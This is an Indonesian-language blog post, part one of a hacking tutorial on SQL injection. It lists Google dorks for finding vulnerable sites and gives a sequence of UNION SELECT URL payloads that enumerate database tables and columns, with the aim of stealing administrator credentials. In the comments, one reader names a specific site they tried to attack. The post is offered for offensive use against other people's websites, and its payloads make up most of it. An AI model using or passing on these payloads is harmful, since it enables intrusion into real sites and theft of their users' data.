01/01/10

Tutorial SQLi part 1

Inilah tutorialku soal hacking yang pertama:

Pertama-tama, weh-weh terlalu formal neh. Coretan2 dibawah ini buatan seorang yang bodoh jadi kalau ada salahnya mohon maap ya tmen2. Mungkin diantara kita ada yang bertanya? apakah yang dimaksud SQLi. Wah kalo gitu pertanyaannya silahkan googling pliss, SQLi (aka Sql Injection Structured Query Language Injection) adalah salah satu cara termudah untuk mengeksploitasi / hacking situs. Cara ini tergolong mudah tapi hasilnya bukan main-main, apalagi buat orang bodoh kayak saya wakkakakakka..Akan tetapi kebanyakan tutorial SQLi sangat buruk (bukan maksud mengejek), So itulah alasan mengapa aku menulis coretan ini. SQLi memang teknik dasar memasukkan query ke database untuk memperoleh admin dan passwordnya...
Step 1: Mencari Situs yang vulnerability SQLi

Mencari situs yang bisa terinfeksi virus sqli itu sangat mudah tinggal kita googling aj, dan masukin salah satu dork berikut:

inurl:news_view.php?id=

inurl:sql.php?id=

shredder-categories.php?id=

buy.php?category=

t-shirt/product.php?id=

sebenarnya masih banyak sekali model-model dork tetapi sayang, aku males nulisnya hehehehe

setelah masukin dork tadi, langsung pelototin situs2 yang nongol dilayar monitor, seperti:

http://www.malingshitanjing.com/index.php?id=3

untuk ngecek situs tersebut vulnerability sqli, hal yang harus dilakukan adalah ketik " pada akhir url. jadi sekarang urlnya jadi seperti ini:

http://www.malingshitanjing.com/index.php?id=3"

tekan enter dan kamu akan akan menemukan error

warning:you have error sql kampret kayak yang baca hehehe, check the manual qorresponden mysql bla bla....

bila itu terjadi berarti situs itu bisa injeksi

udah basa-basinya langsung aja ya bro

kita masukin querry lagi pada url

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1--

bila page yang tampil masih error atau normal( mungkin dihidden oleh admin), jangan putus asa terus masukin querrynya

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,4--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,5--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3,4,5,6--

sebut saja kita sudah dapat page yang berisi nomor 2

lalu kita masukan querry ini

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+0,1--

kemudian akan muncul page beserta isi dari "table"nya seperti id, name, password tapi muncul satu persatu. buruknya kita harus mencari satu-satu dengan menambahkan querry

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+1,1--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+2,1--

mungkin ada yang mengira url2 diatas tak dirubah tapi cobalah melirik ke akhir url, disitu "0,1" diganti dengan "1,1" terus "2,1" dst sampai kita dapat informasi sesuai keinginan kita. Tapi yang paling penting kita harus dapatkan tabel dengan nama seperti: tbl_user / tbl_admin / user / admin atau apalah yang mirip kata-kata tersebut. Anggap saja kita sudah dapat "tbl_user". Selanjutnya kita ubah "tbl_user" menjadi apa ya....????? pokoknya kita masuk ke piclist.com/techref/ascii lalu kita masukan "tbl_user" lalu kita konvert ke HEX string. lalu kode pada HEX kita copy dan pastekan pada url setelah kata table_name=0x

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,column_name,3,4,5,6+from+
information_schema.columns+where+table_name=0xM4l1N9SH1T4NJ1NG+limit+0,1--

jangan lupa tekan enter, lalu akan muncul page yang merupakan isi dari kolom tersebut

BERSAMBUNG, malas ngetiknya ngantuk.......klo ada yang komentar nanti saya lanjutin...ok

ingin melanjutkan tutorial part 2 klik disini
Greetz: YCL member

3 komentar:

junkelse on 16/01/10 18.03 mengatakan...

nice tutorial..
must try..
:D

Anonim mengatakan...

saya coba ini kox gak bs yah.. mohon tutorial lengkapnya ... ini targetnya http://engel-art.co.il/exhibitions.php?id=77

Pratama Wijaya on 13/02/11 07.21 mengatakan...

ijin coba yah

Posting Komentar



Maaf! Cbox hanya tampil di Homepage


Klik Disini! untuk chatting / kembali ke homepage
 

Site Info

Display Pagerank

Followers

Lewonk Copyright © 2009 Blogger Template Designed by Bie Blogger Template